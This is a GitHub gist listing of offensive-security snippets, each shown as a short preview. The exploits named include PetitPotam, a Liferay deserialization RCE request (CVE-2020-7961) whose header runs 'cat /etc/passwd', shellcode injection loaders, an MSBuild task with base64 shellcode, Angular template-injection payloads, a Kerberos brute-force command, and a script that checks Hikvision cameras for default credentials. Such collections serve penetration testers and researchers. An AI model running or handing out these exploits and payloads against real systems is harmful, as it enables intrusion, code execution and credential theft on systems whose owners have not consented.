ashr
ashr / PetitPotam.py
Created August 12, 2021 16:08 — forked from micahvandeusen/PetitPotam.py
PetitPotam.py modified to use EfsRpcDecryptFileSrv instead of EfsRpcOpenFileRaw
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
# Modified by: Micah Van Deusen (@micahvandeusen)
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@_nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
ashr / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 06:15 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap
ashr / Program.cs
Created January 25, 2021 14:33
Generate a CSV containing ParentObject and SPN name from a BloodHound export of the GetAllSPNS query
using System;
using System.IO;
using System.Linq;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
namespace spns
{
class Program
{
ashr / CreateRemoteThreadDInvoke.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace InjectionTest
{
public class DELEGATES
{
ashr / kerberos_attacks_cheatsheet.md
Created May 11, 2020 09:08 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

ashr / EtwpTest.cs
Created May 8, 2020 08:40 — forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
ashr / _Instructions_Reproduce.md
Created April 29, 2020 10:54
GhostLoader - AppDomainManager - Injection - Ghost in the Shell

GhostLoader Steps :)

1. Create C:\Tools
2. Copy some .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
ashr / AngularTI.md
Created April 20, 2020 12:42 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
ashr / hikvision-scrape.sh
Created February 12, 2020 04:17 — forked from smidgedy/hikvision-scrape.sh
This abomination pulls Hikvision NVR/DVR systems out of masscan output JSON, checks them for default creds, and dumps still images from any system it can access to aid identification. Runs faster if you have GNU Parallel. This is what happens when you start a project as a bash one-liner because opening vscode is too much effort.
#!/bin/bash
# Masscan - common ports are 80, 81, 8000, 8080, 8081, 8090, 8888, 9000, 9001
# I do it like this:
# sudo masscan --banners --source-ip <IP not in use on your network> --rate <how fast you can scan>\
# -iL <list of CIDR to scan> -p <that list of ports above> -oJ <output file.json>
# Output filenames
HIKVISION_LIST_DEFAULT='hikvision-default.txt'
HIKVISION_LIST_NON_DEFAULT='hikvision-nondefault.txt'
ashr / AllIdoIsWin.cs
Created January 15, 2020 09:24
Stolen from Twitter, think it was posted by Casey Smith (@subTee)
/*
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
MyProcess="C:\Windows\notepad.exe"/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />
</Project>
*/